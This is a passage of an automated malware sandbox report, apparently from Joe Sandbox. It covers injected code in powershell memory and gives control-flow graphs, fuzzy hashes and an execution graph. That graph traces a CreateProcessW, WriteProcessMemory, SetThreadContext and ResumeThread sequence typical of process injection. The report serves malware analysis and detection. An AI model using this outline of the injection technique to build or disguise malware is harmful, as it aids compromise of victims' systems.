7fe89980341-7fe8998034f 578->580 579->580 580->570
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (U/$(U/$(U/$0T}$0c}$8=}
                                                • API String ID: 0-3578353684
                                                • Opcode ID: e66efb26d84a4374e9a809661203797f69798a6b6224961d3099e8c293dc3a57
                                                • Instruction ID: c57cbddc36d4802953cb60a62704fb47a3d2592fa65a8ce70f0eca2686c246f4
                                                • Opcode Fuzzy Hash: e66efb26d84a4374e9a809661203797f69798a6b6224961d3099e8c293dc3a57
                                                • Instruction Fuzzy Hash: 42D1023090D7CA0FE70AA73858252B97FE1EF47654F1900EFD48EE71B3D618685683A2
                                                Function 000007FE8998380A Relevance: 6.5, Strings: 5, Instructions: 279COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 582 7fe8998380a-7fe899838b0 583 7fe899838e9-7fe899838f0 582->583 584 7fe899838b2-7fe899838b8 582->584 586 7fe899838f1-7fe8998390f 583->586 585 7fe899838ba-7fe899838e7 584->585 584->586 585->583 587 7fe89983926 586->587 588 7fe89983911-7fe89983924 586->588 589 7fe89983928-7fe8998392a 587->589 588->589 590 7fe899839da-7fe899839e4 589->590 591 7fe89983930-7fe89983933 589->591 593 7fe899839e6-7fe899839f2 590->593 594 7fe899839f3-7fe89983a03 590->594 591->590 592 7fe89983939-7fe89983941 591->592 595 7fe89983951 592->595 596 7fe89983943-7fe8998394d 592->596 597 7fe89983a10-7fe89983a36 594->597 598 7fe89983a05-7fe89983a09 594->598 602 7fe89983956-7fe89983963 595->602 599 7fe8998396d-7fe899839d9 596->599 600 7fe8998394f 596->600 598->597 600->602 602->599 603 7fe89983965-7fe8998396b 602->603 603->599
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 88;$XhB$`kx$h.{$h.{
                                                • API String ID: 0-3531803333
                                                • Opcode ID: ca58a27fcf391b3d343dd6151bb164bd19dbf397fcba38ee914bdf6f6d879c5b
                                                • Instruction ID: 9e3f77025a2f6dccb724747fd01c1599de87477494c75a7ac7fafdab2d64d41a
                                                • Opcode Fuzzy Hash: ca58a27fcf391b3d343dd6151bb164bd19dbf397fcba38ee914bdf6f6d879c5b
                                                • Instruction Fuzzy Hash: 9C811F2190EBD60FEB43937858656A57FF1DF4B660B0E41EBC489DB0B3D509AC0AC362

                                                Execution Graph

                                                Execution Coverage:12.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:41
                                                Total number of Limit Nodes:1
                                                execution_graph 2618 7fe89886e49 2619 7fe89886e57 Wow64SetThreadContext 2618->2619 2621 7fe89886fa1 2619->2621 2622 7fe89887539 2623 7fe89887547 ResumeThread 2622->2623 2625 7fe8988761c 2623->2625 2626 7fe8988734d 2627 7fe8988735b WriteProcessMemory 2626->2627 2629 7fe898874d4 2627->2629 2630 7fe89885c31 2632 7fe89885c80 2630->2632 2633 7fe89885cbe 2632->2633 2634 7fe898856b0 2632->2634 2635 7fe89885d20 2634->2635 2651 7fe89885780 2635->2651 2637 7fe89885eee 2641 7fe89885ffc 2637->2641 2655 7fe898857a0 2637->2655 2639 7fe89886398 2659 7fe898857e0 2639->2659 2641->2639 2642 7fe898863c1 2643 7fe8988668c 2642->2643 2647 7fe898857e0 WriteProcessMemory 2642->2647 2644 7fe898857e0 WriteProcessMemory 2643->2644 2645 7fe898866fb 2644->2645 2648 7fe89886801 2645->2648 2663 7fe898857c0 2645->2663 2647->2642 2667 7fe89885810 2648->2667 2652 7fe89886a40 CreateProcessW 2651->2652 2654 7fe89886cd0 2652->2654 2654->2637 2657 7fe89886e90 Wow64SetThreadContext 2655->2657 2658 7fe89886fa1 2657->2658 2658->2641 2661 7fe89887370 WriteProcessMemory 2659->2661 2662 7fe898874d4 2661->2662 2662->2642 2664 7fe89886e90 Wow64SetThreadContext 2663->2664 2666 7fe89886fa1 2664->2666 2666->2648 2668 7fe89887560 ResumeThread 2667->2668 2670 7fe898868ec 2668->2670 2670->2632 2671 7fe89886a15 2672 7fe89886a40 CreateProcessW 2671->2672 2674 7fe89886cd0 2672->2674

                                                Executed Functions

                                                Function 000007FE8995133E Relevance: 18.5, Strings: 14, Instructions: 1017COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 187 7fe8995133e-7fe89951398 189 7fe899513b0-7fe899513c4 187->189 190 7fe8995139a-7fe899513af 187->190 191 7fe899515b3-7fe8995165d 189->191 192 7fe899513ca-7fe899513d4 189->192 190->189 226 7fe89951660-7fe89951671 191->226 227 7fe8995165f 191->227 193 7fe899513ed-7fe899513f2 192->193 194 7fe899513d6-7fe899513e3 192->194 195 7fe89951554-7fe8995155e 193->195 196 7fe899513f8-7fe899513fb 193->196 194->193 198 7fe899513e5-7fe899513eb 194->198 201 7fe89951560-7fe8995156c 195->201 202 7fe8995156d-7fe8995157d 195->202 199 7fe89951412 196->199 200 7fe899513fd-7fe89951410 196->200 198->193 203 7fe89951414-7fe89951416 199->203 200->203 205 7fe8995157f-7fe89951583 202->205 206 7fe8995158a-7fe899515b0 202->206 203->195 208 7fe8995141c-7fe89951453 203->208 205->206 206->191 214 7fe89951455-7fe89951475 208->214 215 7fe89951477 208->215 217 7fe89951479-7fe8995147b 214->217 215->217 217->195 218 7fe89951481-7fe89951484 217->218 221 7fe8995149b 218->221 222 7fe89951486-7fe89951499 218->222 224 7fe8995149d-7fe8995149f 221->224 222->224 224->195 228 7fe899514a5-7fe899514df 224->228 229 7fe89951674-7fe89951704 226->229 230 7fe89951673 226->230 227->226 243 7fe899514e1-7fe899514ee 228->243 244 7fe899514f8-7fe899514fe 228->244 231 7fe8995183d-7fe899518e9 229->231 232 7fe8995170a-7fe89951714 229->232 230->229 281 7fe899518ec-7fe899518fd 231->281 282 7fe899518eb 231->282 234 7fe8995172d-7fe89951732 232->234 235 7fe89951716-7fe89951723 232->235 238 7fe899517de-7fe899517e8 234->238 239 7fe89951738-7fe8995173b 234->239 235->234 236 7fe89951725-7fe8995172b 235->236 236->234 241 7fe899517ea-7fe899517f6 238->241 242 7fe899517f7-7fe89951807 238->242 245 7fe89951752 239->245 246 7fe8995173d-7fe89951750 239->246 247 7fe89951814-7fe8995183a 242->247 248 7fe89951809-7fe8995180d 242->248 243->244 250 7fe899514f0-7fe899514f6 243->250 251 7fe89951500-7fe8995150d 244->251 252 7fe8995151a-7fe8995151d 244->252 253 7fe89951754-7fe89951756 245->253 246->253 247->231 248->247 250->244 251->252 256 7fe8995150f-7fe89951518 251->256 260 7fe89951524-7fe8995152d 252->260 253->238 255 7fe8995175c-7fe8995175f 253->255 257 7fe89951761-7fe89951784 255->257 258 7fe89951786 255->258 256->252 266 7fe89951788-7fe8995178a 257->266 258->266 264 7fe8995152f-7fe8995153c 260->264 265 7fe89951546-7fe89951553 260->265 264->265 269 7fe8995153e-7fe89951544 264->269 266->238 270 7fe8995178c-7fe899517b7 266->270 269->265 277 7fe899517d0-7fe899517dd 270->277 278 7fe899517b9-7fe899517c6 270->278 278->277 280 7fe899517c8-7fe899517ce 278->280 280->277 284 7fe89951900-7fe89951994 281->284 285 7fe899518ff 281->285 282->281 286 7fe89951af2-7fe89951b9d 284->286 287 7fe8995199a-7fe899519a4 284->287 285->284 324 7fe89951ba0-7fe89951bb1 286->324 325 7fe89951b9f 286->325 288 7fe899519bd-7fe899519c2 287->288 289 7fe899519a6-7fe899519b3 287->289 291 7fe89951a93-7fe89951a9d 288->291 292 7fe899519c8-7fe899519cb 288->292 289->288 290 7fe899519b5-7fe899519bb 289->290 290->288 296 7fe89951a9f-7fe89951aab 291->296 297 7fe89951aac-7fe89951abc 291->297 294 7fe899519e2 292->294 295 7fe899519cd-7fe899519e0 292->295 299 7fe899519e4-7fe899519e6 294->299 295->299 301 7fe89951abe-7fe89951ac2 297->301 302 7fe89951ac9-7fe89951aef 297->302 299->291 303 7fe899519ec-7fe899519ef 299->303 301->302 302->286 305 7fe899519f1-7fe89951a04 303->305 306 7fe89951a06 303->306 308 7fe89951a08-7fe89951a0a 305->308 306->308 308->291 309 7fe89951a10-7fe89951a16 308->309 311 7fe89951a32-7fe89951a38 309->311 312 7fe89951a18-7fe89951a25 309->312 313 7fe89951a54-7fe89951a92 311->313 314 7fe89951a3a-7fe89951a47 311->314 312->311 315 7fe89951a27-7fe89951a30 312->315 314->313 317 7fe89951a49-7fe89951a52 314->317 315->311 317->313 326 7fe89951bb4-7fe89951bc9 324->326 327 7fe89951bb3 324->327 325->324 327->326
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (bS$0T}$0T}$0T}$0c}$0c}$0c}$8=}$8=}$8=}$XhB$XhB$r6&$r6&
                                                • API String ID: 0-1540602673
                                                • Opcode ID: 826419631c0ecce7800ab9893de51294f51a6557e10ee001ef9c738031697867
                                                • Instruction ID: fda412718c9fc84968cdea80990d630e3bff37538a75c313d5ae3d6951c04606
                                                • Opcode Fuzzy Hash: 826419631c0ecce7800ab9893de51294f51a6557e10ee001ef9c738031697867
                                                • Instruction Fuzzy Hash: DD52E020A0DBCA0FE75BA77858242767FE1EF4A254F1901EBD48EC71B3EA18AC55C351
                                                Function 000007FE89953409 Relevance: 14.0, Strings: 10, Instructions: 1472COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 328 7fe89953409-7fe8995341f 329 7fe89953421-7fe8995342f 328->329 330 7fe89953439-7fe8995343f 328->330 329->330 331 7fe89953431-7fe89953437 329->331 332 7fe89953445-7fe89953448 330->332 333 7fe8995353e-7fe89953548 330->333 331->330 336 7fe89953491 332->336 337 7fe8995344a-7fe8995345d 332->337 334 7fe8995354a-7fe8995355a 333->334 335 7fe8995355b-7fe8995356b 333->335 339 7fe8995356d-7fe89953571 335->339 340 7fe89953578-7fe899535a6 335->340 338 7fe89953493-7fe89953495 336->338 346 7fe89953463-7fe8995346d 337->346 347 7fe899535a9-7fe89953651 337->347 338->333 342 7fe8995349b-7fe8995349e 338->342 339->340 340->347 342->333 344 7fe899534a4-7fe899534a7 342->344 344->333 348 7fe899534ad-7fe899534eb 344->348 349 7fe8995346f-7fe8995347c 346->349 350 7fe89953486-7fe8995348f 346->350 368 7fe89953653-7fe89953659 347->368 369 7fe8995365d-7fe89953669 347->369 348->333 358 7fe899534ed-7fe899534f3 348->358 349->350 351 7fe8995347e-7fe89953484 349->351 350->338 351->350 359 7fe899534f5-7fe89953502 358->359 360 7fe89953512-7fe89953528 358->360 359->360 362 7fe89953504-7fe89953510 359->362 363 7fe8995352e-7fe8995353d 360->363 362->360 368->369 370 7fe89953675-7fe899536f2 369->370 371 7fe8995366b-7fe89953671 369->371 372 7fe899536f4-7fe89953721 370->372 373 7fe8995373c-7fe89953741 370->373 371->370 374 7fe89953963-7fe8995397b 372->374 375 7fe89953727-7fe89953731 372->375 376 7fe89953743-7fe89953744 373->376 377 7fe8995374b 373->377 384 7fe899539c5-7fe89953a17 374->384 385 7fe8995397d-7fe899539c3 374->385 375->377 378 7fe89953733-7fe8995373b 375->378 379 7fe8995374c-7fe89953750 376->379 386 7fe89953746-7fe89953749 376->386 377->379 378->373 382 7fe899538f2-7fe899538fc 379->382 383 7fe89953756-7fe89953759 379->383 387 7fe899538fe 382->387 388 7fe8995390f-7fe8995391f 382->388 389 7fe89953770 383->389 390 7fe8995375b-7fe8995376e 383->390 409 7fe89953a22-7fe89953a92 384->409 410 7fe89953a19-7fe89953a21 384->410 385->384 386->377 391 7fe899538ff-7fe8995390e 387->391 392 7fe89953921-7fe89953925 388->392 393 7fe8995392c-7fe89953962 388->393 394 7fe89953772-7fe89953774 389->394 390->394 392->393 394->382 397 7fe8995377a-7fe899537ae 394->397 405 7fe899537c5 397->405 406 7fe899537b0-7fe899537c3 397->406 408 7fe899537c7-7fe899537c9 405->408 406->408 408->382 411 7fe899537cf-7fe899537d2 408->411 410->409 411->382 412 7fe899537d8-7fe899537db 411->412 413 7fe899537f2 412->413 414 7fe899537dd-7fe899537f0 412->414 415 7fe899537f4-7fe899537f6 413->415 414->415 415->382 416 7fe899537fc-7fe899537ff 415->416 416->382 417 7fe89953805-7fe8995383f 416->417 420 7fe89953841-7fe8995384e 417->420 421 7fe89953858-7fe89953865 417->421 420->421 422 7fe89953850-7fe89953856 420->422 423 7fe89953879-7fe8995387f 421->423 424 7fe89953867-7fe89953872 421->424 422->421 425 7fe899538f0-7fe899538f1 423->425 426 7fe89953881-7fe89953883 423->426 424->423 426->391 428 7fe89953885 426->428 429 7fe899538cc 428->429 430 7fe89953887-7fe8995389e 428->430 431 7fe899538cf-7fe899538d7 429->431 430->431 432 7fe899538a0-7fe899538c8 430->432 433 7fe899538db-7fe899538e0 431->433 434 7fe899538d8-7fe899538d9 431->434 432->429 435 7fe899538e1-7fe899538ef 433->435 434->435 435->425
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (U/$(U/$(U/$0T}$0T}$0c}$0c}$8=}$8=}$P*0
                                                • API String ID: 0-2426854366
                                                • Opcode ID: 030fde3b7ec97d48eb2c368932a650bd7aa2c7e58437087b3c98cdad76308015
                                                • Instruction ID: ad48a8f9528b5451d6f7b6b264c8fefe338d0e4625bcfb50f5a22a44e037c005
                                                • Opcode Fuzzy Hash: 030fde3b7ec97d48eb2c368932a650bd7aa2c7e58437087b3c98cdad76308015
                                                • Instruction Fuzzy Hash: A232243090D7C94FE74AA77858162BA7FE1EF87254F1901EAD48EC71B3D618AC16C392
                                                Function 000007FE89886A15 Relevance: 1.9, APIs: 1, Instructions: 377processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 437 7fe89886a15-7fe89886adf 440 7fe89886afb-7fe89886b0b 437->440 441 7fe89886ae1-7fe89886af8 437->441 442 7fe89886b27-7fe89886b7a 440->442 443 7fe89886b0d-7fe89886b24 440->443 441->440 444 7fe89886b7c-7fe89886b9c 442->444 445 7fe89886ba2-7fe89886cce CreateProcessW 442->445 443->442 444->445 449 7fe89886cd6-7fe89886dc4 call 7fe89886dc5 445->449 450 7fe89886cd0 445->450 450->449
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7ad9f9efcf76dcb7270f3823a3889fe1f256508a865974cd71ea866bcc75c42a
                                                • Instruction ID: 2b23d145a96c23e2b254274509eaa9f28acdb9a2f824543dc52a85ceb82da8a6
                                                • Opcode Fuzzy Hash: 7ad9f9efcf76dcb7270f3823a3889fe1f256508a865974cd71ea866bcc75c42a
                                                • Instruction Fuzzy Hash: B4C11770908A5D8FDB99DF18C854BE9BBF1FB69311F0001AAD04EE3291DB75AA85CF40
                                                Function 000007FE89885780 Relevance: 1.9, APIs: 1, Instructions: 362processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 461 7fe89885780-7fe89886adf 464 7fe89886afb-7fe89886b0b 461->464 465 7fe89886ae1-7fe89886af8 461->465 466 7fe89886b27-7fe89886b7a 464->466 467 7fe89886b0d-7fe89886b24 464->467 465->464 468 7fe89886b7c-7fe89886b9c 466->468 469 7fe89886ba2-7fe89886cce CreateProcessW 466->469 467->466 468->469 473 7fe89886cd6-7fe89886dc4 call 7fe89886dc5 469->473 474 7fe89886cd0 469->474 474->473
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: a8147ab4ef75d43e1a016039b0ed2b720120c9c9f9d6699655195e7cdd657b77
                                                • Instruction ID: 9969da7bafc3c732524c82466edffe75d49cab10bec7ad30474feb588a1e8c4d
                                                • Opcode Fuzzy Hash: a8147ab4ef75d43e1a016039b0ed2b720120c9c9f9d6699655195e7cdd657b77
                                                • Instruction Fuzzy Hash: 48C1E670908A5D8FDB98DF58C894BE9B7F1FB69301F1011AAD40EE3691DB75AA84CF40
                                                Function 000007FE8988734D Relevance: 1.7, APIs: 1, Instructions: 212injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 485 7fe8988734d-7fe89887359 486 7fe8988735b-7fe89887363 485->486 487 7fe89887364-7fe89887411 485->487 486->487 490 7fe89887439-7fe898874d2 WriteProcessMemory 487->490 491 7fe89887413-7fe89887436 487->491 492 7fe898874da-7fe89887536 490->492 493 7fe898874d4 490->493 491->490 493->492
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 90e2ed570cbd65326a6d95431640f21844e4a0ed945383e2177cc0d6c36d7ee5
                                                • Instruction ID: f72dce96173a5118e637d85d5e13f4c0b7e771f90b8625e0e4e8e66a5179ff5c
                                                • Opcode Fuzzy Hash: 90e2ed570cbd65326a6d95431640f21844e4a0ed945383e2177cc0d6c36d7ee5
                                                • Instruction Fuzzy Hash: 69611270908A5D8FDB98DF98C894BE9BBF1FB69310F1041AED04DE3291DB74A985CB44
                                                Function 000007FE898857E0 Relevance: 1.7, APIs: 1, Instructions: 204injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 495 7fe898857e0-7fe89887411 498 7fe89887439-7fe898874d2 WriteProcessMemory 495->498 499 7fe89887413-7fe89887436 495->499 500 7fe898874da-7fe89887536 498->500 501 7fe898874d4 498->501 499->498 501->500
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 23a092335f705f736b3804d0b5df2dee3c57747f4984f806c064818db8b40fab
                                                • Instruction ID: 33e23a17b6e11336d01ff025b6e05c6a60ddc8d7cf3acc5537612ac566a1e76a
                                                • Opcode Fuzzy Hash: 23a092335f705f736b3804d0b5df2dee3c57747f4984f806c064818db8b40fab
                                                • Instruction Fuzzy Hash: 6D51F070908A1D8FDB98DF98C884BE9BBF1FB69314F1051AED04EE3251DB74A985CB44
                                                Function 000007FE89886E49 Relevance: 1.7, APIs: 1, Instructions: 188threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 503 7fe89886e49-7fe89886e55 504 7fe89886e57-7fe89886e5f 503->504 505 7fe89886e60-7fe89886f14 503->505 504->505 508 7fe89886f36-7fe89886f9f Wow64SetThreadContext 505->508 509 7fe89886f16-7fe89886f33 505->509 510 7fe89886fa7-7fe89886ff1 508->510 511 7fe89886fa1 508->511 509->508 511->510
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 405c29ff3f5d1ceda87ec007d8797666b619b4755aa225b93876c843f7ee6748
                                                • Instruction ID: 67f077bc69279be5746aca7001430f7ea6a6f9d910f4f4a2d44bdc6adb5ea58a
                                                • Opcode Fuzzy Hash: 405c29ff3f5d1ceda87ec007d8797666b619b4755aa225b93876c843f7ee6748
                                                • Instruction Fuzzy Hash: 17517E70D0864D8FDB55DF98C844BE9BBF1FB66311F10829AD048E7266D774A485CF50
                                                Function 000007FE898857C0 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 521 7fe898857c0-7fe89886f14 524 7fe89886f36-7fe89886f9f Wow64SetThreadContext 521->524 525 7fe89886f16-7fe89886f33 521->525 526 7fe89886fa7-7fe89886ff1 524->526 527 7fe89886fa1 524->527 525->524 527->526
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 30066806eebd1723e33e958d9ebc2561dbda9f558d4194e86c09e4ec7071f1b5
                                                • Instruction ID: 53a9bd4b3b83d19324c4683787472fe551ea014a7b8c1ba053f4a6ef446e7f6e
                                                • Opcode Fuzzy Hash: 30066806eebd1723e33e958d9ebc2561dbda9f558d4194e86c09e4ec7071f1b5
                                                • Instruction Fuzzy Hash: D7510870D08A1D8FEB94DF99C484BE9BBF1FBA9311F10826AD009E3255D774A985CF80
                                                Function 000007FE898857A0 Relevance: 1.7, APIs: 1, Instructions: 165threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 513 7fe898857a0-7fe89886f14 516 7fe89886f36-7fe89886f9f Wow64SetThreadContext 513->516 517 7fe89886f16-7fe89886f33 513->517 518 7fe89886fa7-7fe89886ff1 516->518 519 7fe89886fa1 516->519 517->516 519->518
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: d64c9d9163691c4a46477b5c0c3b58df943439822b2376c096d28156a8587f43
                                                • Instruction ID: 4b99ee1cd5a287ec8c7a28cd3d6e5e3c600ad00ece8db874f6c06aec6ed22e53
                                                • Opcode Fuzzy Hash: d64c9d9163691c4a46477b5c0c3b58df943439822b2376c096d28156a8587f43
                                                • Instruction Fuzzy Hash: C8510870D08A1D8FEB94DF99C484BE9BBF1FBA9311F10826AD009E3255D774A985CF80
                                                Function 000007FE89887539 Relevance: 1.6, APIs: 1, Instructions: 138threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 529 7fe89887539-7fe89887545 530 7fe89887547-7fe8988754f 529->530 531 7fe89887550-7fe8988761a ResumeThread 529->531 530->531 534 7fe8988761c 531->534 535 7fe89887622-7fe89887660 531->535 534->535
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3dcb76b804c9e98670f57046320d9ece9c98290b176ded64d6fb0dc87b0ecddd
                                                • Instruction ID: 4b451a70c5f242485da2cc2f0d5fa70a1e6695beb9ea773c862b5763dc76349d
                                                • Opcode Fuzzy Hash: 3dcb76b804c9e98670f57046320d9ece9c98290b176ded64d6fb0dc87b0ecddd
                                                • Instruction Fuzzy Hash: 9E414B70D0874C8FDB59DF98D885BADBBF0FB5A310F10419ED049E7292DA74A886CB51
                                                Function 000007FE89885810 Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 537 7fe89885810-7fe8988761a ResumeThread 540 7fe8988761c 537->540 541 7fe89887622-7fe89887660 537->541 540->541
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 290abd34a90297a3e1678cbdf254c815933ee3d24cb1e5b991db1529d09e3164
                                                • Instruction ID: eca266386cf9c6f972449e35814bfe647490d4b0413e22d093585c6b5377e97f
                                                • Opcode Fuzzy Hash: 290abd34a90297a3e1678cbdf254c815933ee3d24cb1e5b991db1529d09e3164
                                                • Instruction Fuzzy Hash: DF41F770E08A0C8FDB98DF98D885BADBBF0FB5A310F10516ED049E7251DA70A886CB51
                                                Function 000007FE89952C7A Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 543 7fe89952c7a-7fe89952c88 544 7fe89952cc0-7fe89952cc9 543->544 545 7fe89952c8a-7fe89952ca4 543->545 546 7fe89952ce2-7fe89952cef 544->546 547 7fe89952ccb-7fe89952cd8 544->547 552 7fe89952cf0-7fe89952cfa 545->552 553 7fe89952ca6-7fe89952cb1 545->553 547->546 549 7fe89952cda-7fe89952ce0 547->549 549->546 554 7fe89952cfc-7fe89952d08 552->554 555 7fe89952d09-7fe89952d19 552->555 558 7fe89952cb8-7fe89952cb9 553->558 556 7fe89952d1b-7fe89952d1f 555->556 557 7fe89952d26-7fe89952d4c 555->557 556->557 558->544
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6&
                                                • API String ID: 0-673405558
                                                • Opcode ID: 87a50c15a25608c76350b5dcb9e41b1c4c11aafc054b3636f90fc32846e1595e
                                                • Instruction ID: 46285410770ad9308fcf0fc5a4d7989c4ff750cf0ce3e8494b69ba1d3bf14ad5
                                                • Opcode Fuzzy Hash: 87a50c15a25608c76350b5dcb9e41b1c4c11aafc054b3636f90fc32846e1595e
                                                • Instruction Fuzzy Hash: 8C21F331B0CAA94FEB56A76CA8153FDB7D2EB99750F1801E7C44EC31B2DA19A8158390
                                                Function 000007FE89952CA1 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 560 7fe89952ca1-7fe89952cb9 562 7fe89952cc0-7fe89952cc9 560->562 563 7fe89952ce2-7fe89952cef 562->563 564 7fe89952ccb-7fe89952cd8 562->564 564->563 565 7fe89952cda-7fe89952ce0 564->565 565->563
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6&
                                                • API String ID: 0-673405558
                                                • Opcode ID: 8ea821b10020111469a21bb47f3ad59ec659686f8118a5b843244f25e287bb4e
                                                • Instruction ID: ea933eef9af90b13b2f193a3b31c239e402defc19a2e3378cb5326a143e44d50
                                                • Opcode Fuzzy Hash: 8ea821b10020111469a21bb47f3ad59ec659686f8118a5b843244f25e287bb4e
                                                • Instruction Fuzzy Hash: A5F02E21F0D9990FF756A3BC28153F86BD1EF59250B1441F7C48EC72B3DA145C148381

                                                Execution Graph

